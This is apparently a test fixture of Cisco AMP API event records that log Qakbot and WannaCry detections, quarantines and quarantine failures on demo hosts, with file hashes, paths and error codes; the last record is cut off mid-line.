-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 